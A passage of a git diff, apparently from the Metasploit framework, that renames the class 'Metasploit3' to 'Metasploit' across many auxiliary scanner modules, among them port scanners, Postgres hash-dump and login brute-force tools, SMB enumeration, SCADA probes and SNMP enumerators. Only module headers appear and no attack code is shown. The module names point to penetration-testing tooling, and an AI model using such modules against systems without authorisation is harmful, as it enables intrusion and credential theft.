--git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index e020120a0e..c72ca3c064 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb b/modules/auxiliary/scanner/portscan/ftpbounce.rb index d84256ff30..3616698c3c 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Order is important here include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index b59ee5c028..31db357b39 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 299c1210af..d13a37b58a 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index 8f64a84695..e7d6806a17 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb index 9e48bfc0ec..899a6822cf 100644 --- a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb +++ b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb index a4c3066cfb..7b2c311641 100644 --- a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb index 9c2d96dc71..24970fe633 100644 --- a/modules/auxiliary/scanner/postgres/postgres_login.rb +++ b/modules/auxiliary/scanner/postgres/postgres_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/postgres' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb index b42313a194..efa1f9c8db 100644 --- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index 8a2bea7d9c..4c175e579c 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/quake/server_info.rb b/modules/auxiliary/scanner/quake/server_info.rb index f8012e7a4c..0ddee0f23b 100644 --- a/modules/auxiliary/scanner/quake/server_info.rb +++ b/modules/auxiliary/scanner/quake/server_info.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/quake' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Rex::Proto::Quake diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index f9174649d9..f4641c20ae 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/redis/file_upload.rb b/modules/auxiliary/scanner/redis/file_upload.rb index 3842aea864..f1b21cc0a6 100644 --- a/modules/auxiliary/scanner/redis/file_upload.rb +++ b/modules/auxiliary/scanner/redis/file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Redis def initialize(info = {}) diff --git a/modules/auxiliary/scanner/redis/redis_server.rb b/modules/auxiliary/scanner/redis/redis_server.rb index 6d91606685..cb4f3212f0 100644 --- a/modules/auxiliary/scanner/redis/redis_server.rb +++ b/modules/auxiliary/scanner/redis/redis_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Redis include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/rogue/rogue_recv.rb b/modules/auxiliary/scanner/rogue/rogue_recv.rb index 4293d6bc1e..e76ebc40c7 100644 --- a/modules/auxiliary/scanner/rogue/rogue_recv.rb +++ b/modules/auxiliary/scanner/rogue/rogue_recv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/rogue/rogue_send.rb b/modules/auxiliary/scanner/rogue/rogue_send.rb index 9e2b9cf3ec..9832790bde 100644 --- a/modules/auxiliary/scanner/rogue/rogue_send.rb +++ b/modules/auxiliary/scanner/rogue/rogue_send.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index f2a93ecf5a..0e4dc663e9 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rservices/rlogin_login.rb b/modules/auxiliary/scanner/rservices/rlogin_login.rb index 7d1414a6d6..bd6bc9cfc4 100644 --- a/modules/auxiliary/scanner/rservices/rlogin_login.rb +++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index 8892b023d5..3bcd98f83a 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 9bdfaaf4f5..19cac36faf 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 7cea619121..05fef9d855 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index 79f9882999..d8ee1cd906 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb index a93c3dfafe..2e6e24de49 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/addp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/scada/digi_addp_version.rb b/modules/auxiliary/scanner/scada/digi_addp_version.rb index 3de56d9a43..23b03af38e 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_version.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/addp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb index 0838eae12e..682e2a874a 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::RealPort include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/digi_realport_version.rb b/modules/auxiliary/scanner/scada/digi_realport_version.rb index b0a9ea2d1c..09e155e757 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_version.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::RealPort include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/koyo_login.rb b/modules/auxiliary/scanner/scada/koyo_login.rb index ecf1f50a29..d133452290 100644 --- a/modules/auxiliary/scanner/scada/koyo_login.rb +++ b/modules/auxiliary/scanner/scada/koyo_login.rb @@ -8,7 +8,7 @@ require 'msf/core' # msfdev is going to want a bunch of other stuff for style/compat but this works # TODO: Make into a real AuthBrute module, although the password pattern is fixed -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/modbus_findunitid.rb b/modules/auxiliary/scanner/scada/modbus_findunitid.rb index d570f4281b..f804a141e7 100644 --- a/modules/auxiliary/scanner/scada/modbus_findunitid.rb +++ b/modules/auxiliary/scanner/scada/modbus_findunitid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index 70b5242414..274b83802c 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/scada/modbusdetect.rb b/modules/auxiliary/scanner/scada/modbusdetect.rb index 7740955785..5cbbe792d9 100644 --- a/modules/auxiliary/scanner/scada/modbusdetect.rb +++ b/modules/auxiliary/scanner/scada/modbusdetect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb index c584b0e939..b3779c9c64 100644 --- a/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb +++ b/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index dc9bcb0b3a..1d2f3beb2f 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sip/enumerator_tcp.rb b/modules/auxiliary/scanner/sip/enumerator_tcp.rb index 134cf2a2b1..5ffc5fbb92 100644 --- a/modules/auxiliary/scanner/sip/enumerator_tcp.rb +++ b/modules/auxiliary/scanner/sip/enumerator_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index 01dc953c4e..34f4ab3993 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/sip/options_tcp.rb b/modules/auxiliary/scanner/sip/options_tcp.rb index 581283c74e..922355dac2 100644 --- a/modules/auxiliary/scanner/sip/options_tcp.rb +++ b/modules/auxiliary/scanner/sip/options_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb index 590b4c3a46..dde0a4c1c0 100644 --- a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb +++ b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index 67304ca6ba..71bedf2906 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index b7c68054c6..5943ee7990 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 6717969a73..252bfecc09 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client::Psexec diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index d145bd5b26..0ddfe37e01 100644 --- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should go first include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb index 1100dd05c1..ac8b3a19d4 100644 --- a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb +++ b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/group_policy_preferences' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index e4118ded74..78a90f101a 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb index 3238c66dfc..3ca80b9df4 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb index e8775e681f..ce8b5156f8 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 0fdf529ca7..e53923cd61 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/smb' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index eddfc7c841..a389609c63 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb index 8a0c584137..1ed65c9b69 100644 --- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb +++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index 9a1c016918..2af76e27c9 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'recog' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first diff --git a/modules/auxiliary/scanner/smtp/smtp_enum.rb b/modules/auxiliary/scanner/smtp/smtp_enum.rb index 7ff74bee87..7c5f241293 100644 --- a/modules/auxiliary/scanner/smtp/smtp_enum.rb +++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb index eae920be73..b103aebcbc 100644 --- a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb +++ b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/smtp/smtp_relay.rb b/modules/auxiliary/scanner/smtp/smtp_relay.rb index cac03b0b94..e978dc86ec 100644 --- a/modules/auxiliary/scanner/smtp/smtp_relay.rb +++ b/modules/auxiliary/scanner/smtp/smtp_relay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index 54069a0dfb..ba552d1a12 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index 99d8353ee0..a8cec3080f 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/arris_dg950.rb b/modules/auxiliary/scanner/snmp/arris_dg950.rb index a071e85520..a5466c38f3 100644 --- a/modules/auxiliary/scanner/snmp/arris_dg950.rb +++ b/modules/auxiliary/scanner/snmp/arris_dg950.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb index f78cc130b9..5e1f24b077 100644 --- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb +++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb index 6f4172e35d..2e514c43f2 100644 --- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb +++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Cisco diff --git a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb index bad6580176..8829a263f0 100644 --- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb +++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Cisco diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb index 8fe98c4273..f148956c8c 100644 --- a/modules/auxiliary/scanner/snmp/netopia_enum.rb +++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb index 904d5e8b0f..6763e8600b 100644 --- a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb +++ b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb index 07530dafd5..09555100ba 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb index dd54f5cd9e..e0db3cbf54 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb index 8886a67ae8..32a033b7f9 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb index 